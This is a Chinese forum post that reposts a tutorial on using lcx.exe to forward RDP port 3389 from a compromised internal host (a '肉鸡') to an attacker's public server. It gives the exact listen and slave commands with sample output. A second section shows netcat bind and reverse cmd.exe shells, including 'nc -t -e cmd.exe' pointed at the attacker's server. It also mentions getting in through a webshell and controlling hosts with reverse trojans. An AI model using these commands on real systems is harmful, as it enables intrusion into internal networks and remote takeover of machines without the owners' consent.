国铧 發表於 2017-9-6 16:57:23

lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

<p>这里小编要讲解到另外一款比较强大的LCX端口转发的工具.</p>
<p><strong>下面就先详细讲解下LXC转发工具与使用方法:</strong></p>
<p>lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,<br />
当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.</p>
<p>用法:</p>
<p>如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave<br />
本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。 <br />
例:现在有一个ip为222.221.221.22的websehll.用端口扫描发现开放了3389端口<br />
可是我们输入外网IP可是不能正常链接。那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。</p>
<p><img src="https://img.jbzj.com/file_images/article/201709/20170906165448.png" alt="" /></p>
<p>这样的就是内网服务器了。<br />
上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。<br />
显示如下[+] Listening port 51 &hellip;&hellip; <br />
[+] Listen OK! <br />
[+] Listening port 3389 &hellip;&hellip; <br />
[+] Listen OK! <br />
[+] Waiting for Client on port:51 &hellip;&hellip;<br />
然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 <br />
222.221.221.22是我举例用的肉鸡IP.换成你的..运行以后本机监听端口。<br />
显示如下信息<br />
[+] Listening port 51 &hellip;&hellip; <br />
[+] Listen OK! <br />
[+] Listening port 3389 &hellip;&hellip; <br />
[+] Listen OK! <br />
[+] Waiting for Client on port:51 &hellip;&hellip; <br />
[+] Accept a Client on port 55 from 222.221.221.22 &hellip;&hellip; <br />
[+] Waiting another Client on port:3389&hellip;.<br />
好了.现在在自己机子上链接 127.0.0.1 或者输你自己IP. <br />
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!优点,搞定内网肉鸡. <br />
缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.当然也可以用反弹木马控制肉鸡</p>
<p><strong>下面是其他网友的补充:</strong></p>
<p>本机: lcx -listen 2222 3333</p>
<p>2222为转发端口,3333为本机任意未被占用的端口</p>
<p>肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389</p>
<p>119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口</p>
<p>3389连接时格式 127.0.0.1:3333</p>
<p><strong>内网转发姿势</strong></p>
<p>一、lcx 的使用</p>
<p>1. 肉鸡上执行:lcx.exe &ndash;slave 公网 ip + 端口 肉鸡 ip + 端口</p>
<p>例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389</p>
<p>意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 公网的 10000 端口</p>
<p>2. 公网 ip 机器上执行 Lcx.exe &ndash;listen 10000 10001</p>
<p>例如:Lcx.exe &ndash;listen 10001 10000</p>
<p>意思是监听公网 ip 机器上的 10001 端口请求,并将 10001 的请求传送给 10000 端口。</p>
<p>此时,RDP 连接,只需要输入 127.0.0.1:10000,即可远程连接到肉鸡上。</p>
<p>二、nc 反弹 cmdshell</p>
<p>1. 开启肉鸡代理执行 cmdshell</p>
<p>在肉鸡上执行 nc -l -p 2333 -t -e cmd.exe</p>
<p>意思是,肉鸡监听本地的 2333 端口,且应答通过 telnet(-t)模式执行 cmd.exe 程序</p>
<p>在自己的公网服务器上执行 nc -nvv 肉鸡 ip 2333</p>
<p>2. 反向代理执行 cmdshell</p>
<p>在公网服务器上运行 nc -l -p 2333</p>
<p>意思是监听本地端口 2333,登台其他电脑登陆过来</p>
<p>在肉鸡上执行 nc -t -e cmd.exe 公网服务器 ip 2333</p>
<p>意思是让肉鸡可以通过 telnet 模式执行 cmd.exe 程序,并可以把执行权通过 2333 端口给公网服务器</p>
頁: [1]
查看完整版本: lcx端口转发详细介绍及使用方法(lcx内网转发姿势)